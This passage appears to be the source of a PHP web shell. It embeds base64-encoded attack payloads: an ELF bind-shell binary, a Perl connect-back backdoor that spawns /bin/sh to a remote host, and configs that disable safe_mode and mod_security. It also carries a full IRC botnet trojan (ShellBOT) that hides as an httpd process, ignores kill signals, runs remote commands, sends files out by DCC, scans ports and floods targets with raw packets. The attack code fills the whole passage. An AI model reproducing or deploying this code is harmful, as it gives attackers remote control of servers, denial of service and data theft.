gAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
2823	$back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0=";
2824	$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
2825	$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
2826	$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
2827
2828	if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
2829	{
2830	$ircadmin=$_POST['ircadmin'];
2831	$ircserver=$_POST['ircserver'];
2832	$ircchan=$_POST['ircchanal'];
2833	$irclabel=$_POST['ircname'];
2834	echo "<title>OverclockiX Shell-Connector \|\| Connecting to $ircserver<title>";
2835	echo "<body bgcolor=\"black\" text=\"green\">";
2836	echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
2837	echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
2838	#######################################################
2839	######################IRC Trojan##########################
2840	$file="
2841	################ CONFIGURACAO #################################################################
2842	my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
2843	#----------------------------------------------################################################
2844	my \$linas_max='48'; # Evita o flood :) depois de X linhas #
2845	#----------------------------------------------################################################
2846	my \$sleep='4'; # ele dorme X segundos #
2847	##################### IRC #####################################################################
2848	my @adms=(\"$ircadmin\"); # Nick do administrador #
2849	#----------------------------------------------################################################
2850	my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
2851	#----------------------------------------------################################################
2852	my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
2853	# aparecer com numero radonamico no final #
2854	#----------------------------------------------################################################
2855	my \$ircname = 'Linux'; # User ID #
2856	#----------------------------------------------################################################
2857	chop (my \$realname = `uname -a`); # Full Name #
2858	#----------------------------------------------################################################
2859	\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
2860	# caso não seja especificado no argumento #
2861	#----------------------------------------------################################################
2862	my \$porta='6667'; # Porta do servidor de irc #
2863	################ ACESSO A SHELL ###############################################################
2864	my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
2865	###############################################################################################
2866	my \$VERSAO = '0.2';
2867	\$SIG{'INT'} = 'IGNORE';
2868	\$SIG{'HUP'} = 'IGNORE';
2869	\$SIG{'TERM'} = 'IGNORE';
2870	\$SIG{'CHLD'} = 'IGNORE';
2871	\$SIG{'PS'} = 'IGNORE';
2872	\$SIG{'STOP'} = 'IGNORE';
2873	use IO::Socket;
2874	use Socket;
2875	use IO::Select;
2876	chdir(\"/\");
2877	\$servidor=\"\$ARGV[0]\" if \$ARGV[0];
2878	$0=\"\$processo\".\"\0\"x16;;
2879	my \$pid=fork;
2880	exit if \$pid;
2881	die \"Problema com o fork: $!\" unless defined(\$pid);
2882	my \$dcc_sel = new IO::Select->new();
2883	#############################
2884	# B0tchZ na veia ehehe :P #
2885	#############################
2886
2887	\$sel_cliente = IO::Select->new();
2888	sub sendraw {
2889	if ($#_ == '1') {
2890	my \$socket = \$_[0];
2891	print \$socket \"\$_[1]\\n\";
2892	} else {
2893	print \$IRC_cur_socket \"\$_[0]\\n\";
2894	}
2895	}
2896	#################################
2897	sub conectar {
2898	my \$meunick = \$_[0];
2899	my \$servidor_con = \$_[1];
2900	my \$porta_con = \$_[2];
2901
2902	my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
2903	if (defined(\$IRC_socket)) {
2904	\$IRC_cur_socket = \$IRC_socket;
2905
2906	\$IRC_socket->autoflush(1);
2907	\$sel_cliente->add(\$IRC_socket);
2908
2909	\$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
2910	\$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
2911	\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
2912	\$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
2913	nick(\"\$meunick\");
2914	sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
2915	sleep 1;
2916	}
2917	} #####################
2918
2919	my \$line_temp;
2920	while( 1 ) {
2921	while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
2922	delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
2923	&DCC::connections;
2924	my @ready = \$sel_cliente->can_read(0);
2925	next unless(@ready);
2926	foreach \$fh (@ready) {
2927	\$IRC_cur_socket = \$fh;
2928	\$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
2929	\$nread = sysread(\$fh, \$msg, 4096);
2930	if (\$nread == 0) {
2931	\$sel_cliente->remove(\$fh);
2932	\$fh->close;
2933	delete(\$irc_servers{\$fh});
2934	}
2935	@lines = split (/\\n/, \$msg);
2936
2937	for(my \$c=0; \$c<= $#lines; \$c++) {
2938	\$line = \$lines[\$c];
2939	\$line=\$line_temp.\$line if (\$line_temp);
2940	\$line_temp='';
2941	\$line =~ s/\\r$//;
2942	unless (\$c == $#lines) {
2943	parse(\"\$line\");
2944	} else {
2945	if ($#lines == 0) {
2946	parse(\"\$line\");
2947	} elsif (\$lines[\$c] =~ /\\r$/) {
2948	parse(\"\$line\");
2949	} elsif (\$line =~ /^(\S+) NOTICE AUTH :\\\*/) {
2950	parse(\"\$line\");
2951	} else {
2952	\$line_temp = \$line;
2953	}
2954	}
2955	}
2956	}
2957	}
2958
2959	#########################
2960
2961
2962	sub parse {
2963	my \$servarg = shift;
2964	if (\$servarg =~ /^PING \:(.*)/) {
2965	sendraw(\"PONG :$1\");
2966	} elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
2967	my \$pn=$1; my \$onde = $4; my \$args = $5;
2968	if (\$args =~ /^\\001VERSION\\001$/) {
2969	notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
2970	}
2971	if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
2972	if (\$onde eq \"\$meunick\"){
2973	shell(\"\$pn\", \"\$args\");
2974	}
2975	if (\$args =~ /^(\Q\$meunick\E\|\!atrix)\s+(.*)/ ) {
2976	my \$natrix = $1;
2977	my \$arg = $2;
2978	if (\$arg =~ /^\!(.*)/) {
2979	ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
2980	} elsif (\$arg =~ /^\@(.*)/) {
2981	\$ondep = \$onde;
2982	\$ondep = \$pn if \$onde eq \$meunick;
2983	bfunc(\"\$ondep\",\"$1\");
2984	} else {
2985	shell(\"\$onde\", \"\$arg\");
2986	}
2987	}
2988	}
2989	} elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
2990	if (lc($1) eq lc(\$meunick)) {
2991	\$meunick=$4;
2992	\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
2993	}
2994	} elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
2995	nick(\"\$meunick\".int rand(9999));
2996	} elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
2997	\$meunick = $2;
2998	\$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
2999	\$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
3000	foreach my \$canal (@canais) {
3001	sendraw(\"JOIN \$canal\");
3002	}
3003	}
3004	}
3005	##########################
3006
3007	sub bfunc {
3008	my \$printl = \$_[0];
3009	my \$funcarg = \$_[1];
3010	if (my \$pid = fork) {
3011	waitpid(\$pid, 0);
3012	} else {
3013	if (fork) {
3014	exit;
3015	} else {
3016	if (\$funcarg =~ /^portscan (.*)/) {
3017	my \$hostip=\"$1\";
3018	my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
3019	my (@aberta, %porta_banner);
3020	foreach my \$porta (@portas) {
3021	my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
3022	if (\$scansock) {
3023	push (@aberta, \$porta);
3024	\$scansock->close;
3025	}
3026	}
3027
3028	if (@aberta) {
3029	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
3030	} else {
3031	sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
3032	}
3033	}
3034	if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
3035	my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
3036	\$dtime = 1 if \$dtime == 0;
3037	my %bytes;
3038	\$bytes{igmp} = $2 * \$pacotes{igmp};
3039	\$bytes{icmp} = $2 * \$pacotes{icmp};
3040	\$bytes{o} = $2 * \$pacotes{o};
3041	\$bytes{udp} = $2 * \$pacotes{udp};
3042	\$bytes{tcp} = $2 * \$pacotes{tcp};
3043
3044	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
3045	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
3046	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
3047	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
3048	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
3049
3050	}
3051	exit;
3052	}
3053	}
3054	}
3055	##########################
3056
3057
3058	sub ircase {
3059	my (\$kem, \$printl, \$case) = @_;
3060
3061
3062	if (\$case =~ /^join (.*)/) {
3063	j(\"$1\");
3064	}
3065	if (\$case =~ /^part (.*)/) {
3066	p(\"$1\");
3067	}
3068	if (\$case =~ /^rejoin\s+(.*)/) {
3069	my \$chan = $1;
3070	if (\$chan =~ /^(\d+) (.*)/) {
3071	for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
3072	p(\"$2\");
3073	j(\"$2\");
3074	}
3075	} else {
3076	p(\"\$chan\");
3077	j(\"\$chan\");
3078	}
3079	}
3080	if (\$case =~ /^op/) {
3081	op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
3082	my \$oarg = substr(\$case, 3);
3083	op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3084	}
3085	if (\$case =~ /^deop/) {
3086	deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
3087	my \$oarg = substr(\$case, 5);
3088	deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3089	}
3090	if (\$case =~ /^voice/) {
3091	voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
3092	\$oarg = substr(\$case, 6);
3093	voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3094	}
3095	if (\$case =~ /^devoice/) {
3096	devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
3097	\$oarg = substr(\$case, 8);
3098	devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3099	}
3100	if (\$case =~ /^msg\s+(\S+) (.*)/) {
3101	msg(\"$1\", \"$2\");
3102	}
3103	if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
3104	for (my \$cf = 1; \$cf <= $1; \$cf++) {
3105	msg(\"$2\", \"$3\");
3106	}
3107	}
3108	if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
3109	ctcp(\"$1\", \"$2\");
3110	}
3111	if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
3112	for (my \$cf = 1; \$cf <= $1; \$cf++) {
3113	ctcp(\"$2\", \"$3\");
3114	}
3115	}
3116	if (\$case =~ /^invite\s+(\S+) (.*)/) {
3117	invite(\"$1\", \"$2\");
3118	}
3119	if (\$case =~ /^nick (.*)/) {
3120	nick(\"$1\");
3121	}
3122	if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
3123	conectar(\"$2\", \"$1\", 6667);
3124	}
3125	if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
3126	DCC::SEND(\"$1\", \"$2\");
3127	}
3128	if (\$case =~ /^raw (.*)/) {
3129	sendraw(\"$1\");
3130	}
3131	if (\$case =~ /^eval (.*)/) {
3132	eval \"$1\";
3133	}
3134	}
3135	##########################
3136
3137	sub shell {
3138	return unless \$secv;
3139	my \$printl=\$_[0];
3140	my \$comando=\$_[1];
3141	if (\$comando =~ /cd (.*)/) {
3142	chdir(\"$1\") \|\| msg(\"\$printl\", \"Dossier Makayench :D \");
3143	return;
3144	}
3145	elsif (\$pid = fork) {
3146	waitpid(\$pid, 0);
3147	} else {
3148	if (fork) {
3149	exit;
3150	} else {
3151	my @resp=`\$comando 2>&1 3>&1`;
3152	my \$c=0;
3153	foreach my \$linha (@resp) {
3154	\$c++;
3155	chop \$linha;
3156	sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
3157	if (\$c == \"\$linas_max\") {
3158	\$c=0;
3159	sleep \$sleep;
3160	}
3161	}
3162	exit;
3163	}
3164	}
3165	}
3166
3167	#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
3168	sub attacker {
3169	my \$iaddr = inet_aton(\$_[0]);
3170	my \$msg = 'B' x \$_[1];
3171	my \$ftime = \$_[2];
3172	my \$cp = 0;
3173	my (%pacotes);
3174	\$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
3175
3176	socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
3177	socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
3178	socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
3179	socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
3180	return(undef) if \$cp == 4;
3181	my \$itime = time;
3182	my (\$cur_time);
3183	while ( 1 ) {
3184	for (my \$porta = 1; \$porta <= 65535; \$porta++) {
3185	\$cur_time = time - \$itime;
3186	last if \$cur_time >= \$ftime;
3187	send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
3188	send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
3189	send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
3190	send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
3191
3192	# DoS ?? :P
3193	for (my \$pc = 3; \$pc <= 255;\$pc++) {
3194	next if \$pc == 6;
3195	\$cur_time = time - \$itime;
3196	last if \$cur_time >= \$ftime;
3197	socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
3198	send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
3199	}
3200	}
3201	last if \$cur_time >= \$ftime;
3202	}
3203	return(\$cur_time, %pacotes);
3204	}
3205
3206	#############
3207	# ALIASES #
3208	#############
3209
3210	sub action {
3211	return unless $#_ == 1;
3212	sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
3213	}
3214
3215	sub ctcp {
3216	return unless $#_ == 1;
3217	sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
3218	}
3219	sub msg {
3220	return unless $#_ == 1;
3221	sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
3222	}
3223
3224	sub notice {
3225	return unless $#_ == 1;
3226	sendraw(\"NOTICE \$_[0] :\$_[1]\");
3227	}
3228
3229	sub op {
3230	return unless $#_ == 1;
3231	sendraw(\"MODE \$_[0] +o \$_[1]\");
3232	}
3233	sub deop {
3234	return unless $#_ == 1;
3235	sendraw(\"MODE \$_[0] -o \$_[1]\");
3236	}
3237	sub hop {
3238	return unless $#_ == 1;
3239	sendraw(\"MODE \$_[0] +h \$_[1]\");
3240	}
3241	sub dehop {
3242	return unless $#_ == 1;
3243	sendraw(\"MODE \$_[0] +h \$_[1]\");
3244	}
3245	sub voice {
3246	return unless $#_ == 1;
3247	sendraw(\"MODE \$_[0] +v \$_[1]\");
3248	}
3249	sub devoice {
3250	return unless $#_ == 1;
3251	sendraw(\"MODE \$_[0] -v \$_[1]\");
3252	}
3253	sub ban {
3254	return unless $#_ == 1;
3255	sendraw(\"MODE \$_[0] +b \$_[1]\");
3256	}
3257	sub unban {
3258	return unless $#_ == 1;
3259	sendraw(\"MODE \$_[0] -b \$_[1]\");
3260	}
3261	sub kick {
3262	return unless $#_ == 1;
3263	sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
3264	}
3265
3266	sub modo {
3267	return unless $#_ == 0;
3268	sendraw(\"MODE \$_[0] \$_[1]\");
3269	}
3270	sub mode { modo(@_); }
3271
3272	sub j { &join(@_); }
3273	sub join {
3274	return unless $#_ == 0;
3275	sendraw(\"JOIN \$_[0]\");
3276	}
3277	sub p { part(@_); }
3278	sub part {sendraw(\"PART \$_[0]\");}
3279
3280	sub nick {
3281	return unless $#_ == 0;
3282	sendraw(\"NICK \$_[0]\");
3283	}
3284
3285	sub invite {
3286	return unless $#_ == 1;
3287	sendraw(\"INVITE \$_[1] \$_[0]\");
3288	}
3289	sub topico {
3290	return unless $#_ == 1;
3291	sendraw(\"TOPIC \$_[0] \$_[1]\");
3292	}
3293	sub topic { topico(@_); }
3294
3295	sub whois {
3296	return unless $#_ == 0;
3297	sendraw(\"WHOIS \$_[0]\");
3298	}
3299	sub who {
3300	return unless $#_ == 0;
3301	sendraw(\"WHO \$_[0]\");
3302	}
3303	sub names {
3304	return unless $#_ == 0;
3305	sendraw(\"NAMES \$_[0]\");
3306	}
3307	sub away {
3308	sendraw(\"AWAY \$_[0]\");
3309	}
3310	sub back { away(); }
3311	sub quit {
3312	sendraw(\"QUIT :\$_[0]\");
3313	}
3314
3315	# DCC
3316	#########################
3317
3318	package DCC;
3319
3320	sub connections {
3321	my @ready = \$dcc_sel->can_read(1);
3322	# return unless (@ready);
3323	foreach my \$fh (@ready) {
3324	my \$dcctipo = \$DCC{\$fh}{tipo};
3325	my \$arquivo = \$DCC{\$fh}{arquivo};
3326	my \$bytes = \$DCC{\$fh}{bytes};
3327	my \$cur_byte = \$DCC{\$fh}{curbyte};
3328	my \$nick = \$DCC{\$fh}{nick};
3329
3330
3331	my \$msg;
3332	my \$nread = sysread(\$fh, \$msg, 10240);
3333
3334	if (\$nread == 0 and \$dcctipo =~ /^(get\|sendcon)$/) {
3335	\$DCC{\$fh}{status} = \"Cancelado\";
3336	\$DCC{\$fh}{ftime} = time;
3337	\$dcc_sel->remove(\$fh);
3338	\$fh->close;
3339	next;
3340	}
3341
3342	if (\$dcctipo eq \"get\") {
3343	\$DCC{\$fh}{curbyte} += length(\$msg);
3344
3345	my \$cur_byte = \$DCC{\$fh}{curbyte};
3346
3347	open(FILE, \">> \$arquivo\");
3348	print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
3349	close(FILE);
3350
3351	my \$packbyte = pack(\"N\", \$cur_byte);
3352	print \$fh \"\$packbyte\";
3353
3354
3355	if (\$bytes == \$cur_byte) {
3356	\$dcc_sel->remove(\$fh);
3357	\$fh->close;
3358	\$DCC{\$fh}{status} = \"Recebido\";
3359	\$DCC{\$fh}{ftime} = time;
3360	next;
3361	}
3362	} elsif (\$dcctipo eq \"send\") {
3363	my \$send = \$fh->accept;
3364	\$send->autoflush(1);
3365	\$dcc_sel->add(\$send);
3366	\$dcc_sel->remove(\$fh);
3367	\$DCC{\$send}{tipo} = 'sendcon';
3368	\$DCC{\$send}{itime} = time;
3369	\$DCC{\$send}{nick} = \$nick;
3370	\$DCC{\$send}{bytes} = \$bytes;
3371	\$DCC{\$send}{curbyte} = 0;
3372	\$DCC{\$send}{arquivo} = \$arquivo;
3373	\$DCC{\$send}{ip} = \$send->peerhost;
3374	\$DCC{\$send}{porta} = \$send->peerport;
3375	\$DCC{\$send}{status} = \"Enviando\";
3376	#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
3377	open(FILE, \"< \$arquivo\");
3378	my \$fbytes;
3379	read(FILE, \$fbytes, 1024);
3380	print \$send \"\$fbytes\";
3381	close FILE;
3382	# delete(\$DCC{\$fh});
3383	} elsif (\$dcctipo eq 'sendcon') {
3384	my \$bytes_sended = unpack(\"N\", \$msg);
3385	\$DCC{\$fh}{curbyte} = \$bytes_sended;
3386	if (\$bytes_sended == \$bytes) {
3387	\$fh->close;
3388	\$dcc_sel->remove(\$fh);
3389	\$DCC{\$fh}{status} = \"Enviado\";
3390	\$DCC{\$fh}{ftime} = time;
3391	next;
3392	}
3393	open(SENDFILE, \"< \$arquivo\");
3394	seek(SENDFILE, \$bytes_sended, 0);
3395	my \$send_bytes;
3396	read(SENDFILE, \$send_bytes, 1024);
3397	print \$fh \"\$send_bytes\";
3398	close(SENDFILE);
3399	}
3400	}
3401	}
3402	##########################
3403
3404	sub SEND {
3405	my (\$nick, \$arquivo) = @_;
3406	unless (-r \"\$arquivo\") {
3407	return(0);
3408	}
3409
3410	my \$dccark = \$arquivo;
3411	\$dccark =~ s/[.*\/](\S+)/$1/;
3412
3413	my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
3414	my \$longip = unpack(\"N\",inet_aton(\$meuip));
3415
3416	my @filestat = stat(\$arquivo);
3417	my \$size_total=\$filestat[7];
3418	if (\$size_total == 0) {
3419	return(0);
3420	}
3421
3422	my (\$porta, \$sendsock);
3423	do {
3424	\$porta = int rand(64511);
3425	\$porta += 1024;
3426	\$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
3427	} until \$sendsock;
3428
3429	\$DCC{\$sendsock}{tipo} = 'send';
3430	\$DCC{\$sendsock}{nick} = \$nick;
3431	\$DCC{\$sendsock}{bytes} = \$size_total;
3432	\$DCC{\$sendsock}{arquivo} = \$arquivo;
3433
3434	&::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
3435
3436	}
3437
3438	sub GET {
3439	my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
3440	return(0) if (-e \"\$arquivo\");
3441	if (open(FILE, \"> \$arquivo\")) {
3442	close FILE;
3443	} else {
3444	return(0);
3445	}
3446
3447	my \$dccip=fixaddr(\$dcclongip);
3448	return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
3449	my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
3450	\$dccsock->autoflush(1);
3451	\$dcc_sel->add(\$dccsock);
3452	\$DCC{\$dccsock}{tipo} = 'get';
3453	\$DCC{\$dccsock}{itime} = time;
